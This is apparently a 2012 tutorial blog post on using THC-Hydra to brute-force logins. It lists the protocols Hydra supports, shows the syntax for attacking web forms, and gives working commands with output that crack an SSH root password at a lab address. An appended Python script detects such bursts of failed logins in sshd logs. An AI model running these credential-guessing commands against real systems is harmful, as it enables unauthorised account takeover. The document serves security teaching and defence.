200 Brute Force — THC-Hydra 3
Posted on 2012-10-4 21:21:57
Supported protocols
It currently supports these protocols:
AFP, Cisco AAA, Cisco auth, Cisco enable, CVS, Firebird, FTP, HTTP-FORM-GET,
HTTP-FORM-POST, HTTP-GET, HTTP-HEAD, HTTP-PROXY, HTTPS-FORM-GET,
HTTPS-FORM-POST, HTTPS-GET, HTTPS-HEAD, HTTP-Proxy, ICQ, IMAP, IRC, LDAP,
MS-SQL, MYSQL, NCP, NNTP, Oracle Listener, Oracle SID, Oracle, PC-Anywhere,
PCNFS, POP3, POSTGRES, RDP, Rexec, Rlogin, Rsh, SAP/R3, SIP, SMB, SMTP,
SMTP Enum, SNMP, SOCKS5, SSH (v1 and v2), Subversion, Teamspeak (TS2),
Telnet, VMware-Auth, VNC and XMPP.
Viewing module information
hydra -U <module name>
  root@Dis9Team:~# hydra -U http-post-form
  Hydra v7.3 (c)2012 by van Hauser/THC & David Maciejak - for legal purposes only

  Hydra (http://www.thc.org/thc-hydra) starting at 2012-07-25 00:40:57

  Help for module http-post-form:
  ============================================================================
  Module http-post-form requires the page and the parameters for the web form.

  By default this module is configured to follow a maximum of 5 redirections in
  a row. It always gathers a new cookie from the same URL without variables
  The parameters take three ":" separated values, plus optional values.

  Syntax:   <url>:<form parameters>:<condition string>[:<optional>[:<optional>]
  First is the page on the server to GET or POST to (URL).
  Second is the POST/GET variables (taken from either the browser, proxy, etc.
  with usernames and passwords being replaced in the "^USER^" and "^PASS^"
  placeholders (FORM PARAMETERS)
  Third is the string that it checks for an *invalid* login (by default)
  Invalid condition login check can be preceded by "F=", successful condition
  login check must be preceded by "S=".
  This is where most people get it wrong. You have to check the webapp what a
  failed string looks like and put it in this parameter!
  The following parameters are optional:
  C=/page/uri     to define a different page to gather initial cookies from
  H=My-Hdr: foo   to send a user defined HTTP header with each request
  Examples:
  "/login.php:user=^USER^&pass=^PASS^&mid=123:incorrect"
  "/login.php:user=^USER^&pass=^PASS^&mid=123:S=authlog=.*success"
  "/login.php:user=^USER^&pass=^PASS^&mid=123:authlog=.*failed"
  "/login:user=^USER&pass=^PASS:failed:H=Authorization: Basic dT1w:H=X-Foo: Bar"
  "/exchweb/bin/auth/owaauth.dll:destination=http%3A%2F%2F<target>%2Fexchange&flags=0&username=<domain>%5C^USER^&password=^PASS^&SubmitCreds=x&trusted=0:reason=:C=/exchweb"
  root@Dis9Team:~# hydra -U http-post-form

It prints the help for the module.
Setting the username and password
User: -l for a single username, -L for a dictionary file
Password: -p for a single password, -P for a dictionary file
Examples
Single user, single password
  root@Dis9Team:~# hydra -l root -p 123456 5.5.5.3 ssh
  Hydra v7.3 (c)2012 by van Hauser/THC & David Maciejak - for legal purposes only

  Hydra (http://www.thc.org/thc-hydra) starting at 2012-07-25 00:45:26
  [DATA] 1 task, 1 server, 1 login try (l:1/p:1), ~1 try per task
  [DATA] attacking service ssh on port 22
  [22][ssh] host: 5.5.5.3   login: root   password: 123456
  [STATUS] attack finished for 5.5.5.3 (waiting for children to finish)
  1 of 1 target successfuly completed, 1 valid password found
  Hydra (http://www.thc.org/thc-hydra) finished at 2012-07-25 00:45:26
  root@Dis9Team:~#
Cracking with a password dictionary
  root@Dis9Team:~# hydra -l root -P /tmp/password 5.5.5.3 ssh

Using dictionaries for both usernames and passwords
  root@Dis9Team:~# hydra -L /tmp/username -P /tmp/password 5.5.5.3 ssh
  Hydra v7.3 (c)2012 by van Hauser/THC & David Maciejak - for legal purposes only

  Hydra (http://www.thc.org/thc-hydra) starting at 2012-07-25 00:46:23
  [DATA] 6 tasks, 1 server, 6 login tries (l:2/p:3), ~1 try per task
  [DATA] attacking service ssh on port 22
  [22][ssh] host: 5.5.5.3   login: root   password: 123456
  [STATUS] attack finished for 5.5.5.3 (waiting for children to finish)
  1 of 1 target successfuly completed, 1 valid password found
  Hydra (http://www.thc.org/thc-hydra) finished at 2012-07-25 00:46:25
  root@Dis9Team:~#

Specifying the protocol port
-s <port>
  root@Dis9Team:~# hydra -L /tmp/username -P /tmp/password 5.5.5.3 ssh -s 22
  Hydra v7.3 (c)2012 by van Hauser/THC & David Maciejak - for legal purposes only

  Hydra (http://www.thc.org/thc-hydra) starting at 2012-07-25 00:47:32
  [DATA] 6 tasks, 1 server, 6 login tries (l:2/p:3), ~1 try per task
  [DATA] attacking service ssh on port 22
  [22][ssh] host: 5.5.5.3   login: root   password: 123456
  [STATUS] attack finished for 5.5.5.3 (waiting for children to finish)
  1 of 1 target successfuly completed, 1 valid password found
  Hydra (http://www.thc.org/thc-hydra) finished at 2012-07-25 00:47:34
  root@Dis9Team:~#

Specifying the number of threads
The default is 16; you can set it with -t
  root@Dis9Team:~# hydra -L /tmp/username -P /tmp/password 5.5.5.3 ssh -t 100
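
On the target, the dictionary runs shown above appear in the sshd auth log as a burst of failed logins from one source, possibly ending in a success. The detector below is an added example, not part of the original post; the log lines, the source address 5.5.5.2, the host name, the threshold and the window are constructed assumptions.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Constructed sshd auth-log lines (not from the post). Source 5.5.5.2 and user
# "admin" are assumed; the burst mirrors the 2-user x 3-password run above.
SAMPLE_LOG = """\
Jul 25 00:46:23 target sshd[2101]: Failed password for root from 5.5.5.2 port 40112 ssh2
Jul 25 00:46:23 target sshd[2102]: Failed password for invalid user admin from 5.5.5.2 port 40113 ssh2
Jul 25 00:46:24 target sshd[2103]: Failed password for root from 5.5.5.2 port 40114 ssh2
Jul 25 00:46:24 target sshd[2104]: Failed password for invalid user admin from 5.5.5.2 port 40115 ssh2
Jul 25 00:46:25 target sshd[2105]: Failed password for invalid user admin from 5.5.5.2 port 40116 ssh2
Jul 25 00:46:25 target sshd[2106]: Accepted password for root from 5.5.5.2 port 40117 ssh2
Jul 25 09:12:40 target sshd[3001]: Failed password for alice from 10.0.0.7 port 51000 ssh2
Jul 25 09:13:05 target sshd[3002]: Accepted password for alice from 10.0.0.7 port 51001 ssh2
"""

LINE_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"(?P<result>Failed|Accepted) password for (?:invalid user )?(?P<user>\S+) "
    r"from (?P<ip>\S+) port \d+"
)

def detect_bruteforce(log_text, threshold=5, window_s=60, year=2012):
    """Alert on sources with >= threshold failures inside window_s seconds, and on
    any accepted login from a source that is currently over that threshold."""
    recent = defaultdict(deque)          # source ip -> timestamps of recent failures
    flagged, alerts = set(), []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        ts = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")
        ip, q = m["ip"], recent[m["ip"]]
        while q and ts - q[0] > timedelta(seconds=window_s):
            q.popleft()                  # drop failures that fell out of the window
        if m["result"] == "Failed":
            q.append(ts)
            if len(q) >= threshold and ip not in flagged:
                flagged.add(ip)
                alerts.append(("bruteforce", ip, len(q)))
        elif len(q) >= threshold:        # success right after a failure burst
            alerts.append(("success_after_bruteforce", ip, m["user"]))
    return alerts

if __name__ == "__main__":
    print(detect_bruteforce(SAMPLE_LOG))
```

The single mistyped password from 10.0.0.7 stays below the threshold and raises nothing; the success after the burst is the alert that should trigger a credential reset for the named account.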



